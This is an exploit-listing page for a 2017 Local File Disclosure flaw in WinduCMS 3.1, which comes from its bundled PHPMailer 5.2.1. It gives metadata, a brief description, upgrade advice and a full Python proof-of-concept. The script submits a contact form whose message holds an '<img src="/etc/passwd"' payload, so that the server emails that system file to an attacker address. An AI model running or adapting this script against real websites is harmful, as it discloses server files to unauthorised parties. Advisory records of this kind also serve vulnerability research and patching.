WinduCMS - exploit.company

vendor:

WinduCMS

by:

Maciek Krupa

7,5

CVSS

HIGH

Local File Disclosure

200

CWE

Product Name: WinduCMS

Affected Version From: 3.1

Affected Version To: 3.1

Patch Exists: Yes

Related CWE: N/A

CPE: a:windu:winducms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux Debian 9

2017

WinduCMS <= 3.1 - Local File Disclosure

Local File Disclosure vulnerability exists in WinduCMS through a vulnerable PHPMailer version 5.2.1 used here. It requires a contact form present on the website. An example of the vulnerable code is {{W name=contactForm inputs="name" email="root@localhost"}}

Mitigation:

Upgrade to the latest version of WinduCMS and PHPMailer.

Source

Exploit-DB raw data:

#!/usr/bin/python
#
# Exploit Title: WinduCMS <= 3.1 - Local File Disclosure
# Date: 2017-12-03
# Exploit Author: Maciek Krupa
# Vendor Homepage: http://windu.org
# Version: 3.1
# Tested on: Linux Debian 9
#
# // Description //
#   
# Local File Disclosure vulnerability exists in WinduCMS through a vulnerable PHPMailer version 5.2.1 used here
# 
# // PoC //
#
# It requires a contact form present on the website
#
# Example: {{W name=contactForm inputs="name" email="root@localhost"}}
#

from requests_toolbelt import MultipartEncoder
import requests

print("WinduCMS <= 3.1 Exploit")
 
url = 'http://localhost/contact_page?mn=contactform.message.negative'
email = 'attacker@example.com'
payload = '<img src="/etc/passwd"'
form_input = 'name'
fields = {'form_key': 'contactForm', form_input: 'Attacker', 'email': email, 'content': payload}
m = MultipartEncoder(fields=fields, boundary='----WebKitFormBoundary1500777958139315')
headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 'Content-Type': m.content_type}
print('Sending payload to target...')
r = requests.post(url, data=m.to_string(), headers=headers)
if r.status_code == 200:
	print('Exploited.')